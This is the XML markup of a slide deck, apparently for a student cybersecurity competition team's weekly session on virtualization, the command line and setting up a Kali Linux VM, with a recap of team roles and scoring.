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 id="2147483661" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId7"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId8"/>
    <p:sldId id="283" r:id="rId35"/>
    <p:sldId id="282" r:id="rId34"/>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78180C5-CB36-4EF2-B2AC-066172CEEAD5}">
  <a:tblStyle styleId="{478180C5-CB36-4EF2-B2AC-066172CEEAD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xml"/><Relationship Id="rId35"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 name="Shape 52"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;53;g3f4443109e2_1_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 name="Google Shape;54;g3f4443109e2_1_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 name="Google Shape;55;g3f4443109e2_1_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f4443109e2_1_1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6" name="Google Shape;66;g3f4443109e2_1_1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 name="Google Shape;67;g3f4443109e2_1_1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f4443109e2_1_4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6" name="Google Shape;96;g3f4443109e2_1_4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7" name="Google Shape;97;g3f4443109e2_1_4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f4443109e2_1_7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5" name="Google Shape;125;g3f4443109e2_1_7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 name="Google Shape;126;g3f4443109e2_1_7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f4443109e2_1_10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g3f4443109e2_1_10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g3f4443109e2_1_10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f4443109e2_1_13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g3f4443109e2_1_13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g3f4443109e2_1_13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f4443109e2_1_156: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8" name="Google Shape;208;g3f4443109e2_1_156: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g3f4443109e2_1_156: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f4443109e2_1_18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g3f4443109e2_1_18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 name="Google Shape;237;g3f4443109e2_1_18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f4443109e2_1_22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5" name="Google Shape;275;g3f4443109e2_1_22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6" name="Google Shape;276;g3f4443109e2_1_22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g3f4443109e2_1_24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g3f4443109e2_1_24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4" name="Google Shape;304;g3f4443109e2_1_24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3f4443109e2_1_277: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g3f4443109e2_1_277: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g3f4443109e2_1_277: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f4443109e2_1_30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2" name="Google Shape;362;g3f4443109e2_1_30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3" name="Google Shape;363;g3f4443109e2_1_30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f4443109e2_1_31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2" name="Google Shape;372;g3f4443109e2_1_31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3" name="Google Shape;373;g3f4443109e2_1_31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f4443109e2_1_35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g3f4443109e2_1_35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8" name="Google Shape;418;g3f4443109e2_1_35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f4443109e2_1_399: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g3f4443109e2_1_399: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g3f4443109e2_1_399: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f4443109e2_1_445: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6" name="Google Shape;506;g3f4443109e2_1_445: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g3f4443109e2_1_445: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4" name="Shape 524"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Google Shape;525;g3f4443109e2_1_46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6" name="Google Shape;526;g3f4443109e2_1_46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7" name="Google Shape;527;g3f4443109e2_1_46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3f4443109e2_1_49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g3f4443109e2_1_49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g3f4443109e2_1_49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3f4443109e2_1_52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5" name="Google Shape;585;g3f4443109e2_1_52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6" name="Google Shape;586;g3f4443109e2_1_52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g3f4443109e2_1_543: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8" name="Google Shape;608;g3f4443109e2_1_543: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9" name="Google Shape;609;g3f4443109e2_1_543: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5" name="Shape 645"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Google Shape;646;g3f4443109e2_1_581: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7" name="Google Shape;647;g3f4443109e2_1_581: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8" name="Google Shape;648;g3f4443109e2_1_581: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3f4443109e2_1_620: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7" name="Google Shape;687;g3f4443109e2_1_620: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8" name="Google Shape;688;g3f4443109e2_1_620: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0" name="Shape 730"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="731" name="Google Shape;731;g3f4443109e2_1_66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32" name="Google Shape;732;g3f4443109e2_1_66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3" name="Google Shape;733;g3f4443109e2_1_66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3f4443109e2_1_702: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71" name="Google Shape;771;g3f4443109e2_1_702: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2" name="Google Shape;772;g3f4443109e2_1_702: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6" name="Shape 796"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Google Shape;797;g3f4443109e2_1_728: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98" name="Google Shape;798;g3f4443109e2_1_728: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9" name="Google Shape;799;g3f4443109e2_1_728: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g3f4443109e2_1_784:notes"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="857250"/>
            <a:ext cx="5486400" cy="231457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5" name="Google Shape;855;g3f4443109e2_1_784:notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3300413"/>
            <a:ext cx="5486400" cy="2700338"/>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56" name="Google Shape;856;g3f4443109e2_1_784:notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="6513910"/>
            <a:ext cx="2971800" cy="34409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51" name="Shape 5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 name="Shape 50"/>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5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9.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId9"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11.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46.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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6.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7"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6.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId6"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9.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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3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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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11.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId6"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46.png"/><Relationship Id="rId4"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53.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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75.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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6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59.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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56" name="Shape 56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="-1371600"/>
            <a:ext cx="4800600" cy="480060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8" name="Google Shape;58;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063740" y="-754380"/>
            <a:ext cx="3566160" cy="3566160"/>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logo-stk-w.png" id="59" name="Google Shape;59;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="356616"/>
            <a:ext cx="994410" cy="903884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Google Shape;60;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="1611630"/>
            <a:ext cx="61722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100"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4AD4C4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>TUESDAY SESSION · WEEK 3</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;61;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1885950"/>
            <a:ext cx="802386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3200"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Virtualization &amp; the Command Line</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Google Shape;62;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="2640330"/>
            <a:ext cx="72009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300"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en" sz="1300" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>From "what is a shell" to a working Kali Linux VM on your own laptop</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1300" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="4526280"/>
            <a:ext cx="685800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1000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C9C0B4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Tuesdays &amp; Thursdays, 5:30-7:00 PM  •  Simons 281</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1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sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;p17"/>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LAST TIME</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p17"/>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What we covered Thursday</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48006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2" name="Google Shape;102;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67208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03" name="Google Shape;103;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="732709" y="1658539"/>
            <a:ext cx="345095" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123444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Team roles</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;105;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="185166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Gold, White, Red, and Black/Orange, and which one you can never trust unprompted.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469773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 name="Google Shape;107;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488975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08" name="Google Shape;108;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4950379" y="1658539"/>
            <a:ext cx="345094" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545211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Scoring</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452110" y="185166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Roughly half from uptime, half from injects and incident reports.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48006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2" name="Google Shape;112;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67208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13" name="Google Shape;113;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="732709" y="3338749"/>
            <a:ext cx="345095" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123444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Lessons applied</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="353187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This year's specific roles (Domain Admin, Threat Hunters, Engineers) exist because of what went wrong last time.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469773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7" name="Google Shape;117;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488975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18" name="Google Shape;118;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4950379" y="3338749"/>
            <a:ext cx="345094" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545211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Carrying forward</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452110" y="353187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Carrying forward: turning last time's concepts into a working VM.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p17"/>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Recap</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p17"/>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 name="Shape 68"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p16"/>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TONIGHT'S </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="1C7268"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>AGENDA</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;70;p16"/>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lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Meeting Plan</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Google Shape;71;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1337310"/>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2" name="Google Shape;72;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="560710" y="1383670"/>
            <a:ext cx="263896" cy="263896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
